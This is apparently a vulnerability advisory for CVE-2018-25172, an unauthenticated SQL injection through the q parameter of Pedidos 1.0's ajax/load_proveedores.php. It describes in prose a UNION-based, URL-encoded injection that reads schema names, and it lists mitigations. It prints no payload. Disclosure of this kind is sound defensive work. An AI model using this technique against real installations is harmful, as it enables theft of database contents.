CVE-2018-25172

Vulnerability

Details

Pedidos 1.0 is vulnerable to SQL injection in the ajax/load_proveedores.php endpoint. The q parameter is directly concatenated into SQL queries without sanitization, enabling unauthenticated attackers to inject arbitrary SQL commands [1]. The official description confirms that malicious code can be injected through this parameter.

Exploitation

An attacker can exploit this vulnerability by sending a crafted GET request to ajax/load_proveedores.php?q=[SQL]. No authentication is required. The proof-of-concept demonstrates a UNION-based injection that extracts database schema names using GROUP_CONCAT from INFORMATION_SCHEMA.SCHEMATA [1]. The payload is URL-encoded to bypass basic filters.

Impact

Successful exploitation allows an attacker to retrieve sensitive database information, including schema names and table structures. This can serve as a stepping stone for further attacks, such as extracting user credentials or other confidential data stored in the database.

Mitigation

As of the publication date, no official patch has been released for Pedidos 1.0. The software may be abandoned. Mitigation requires implementing input validation, using parameterized queries, or applying a web application firewall (WAF) to block malicious SQL patterns.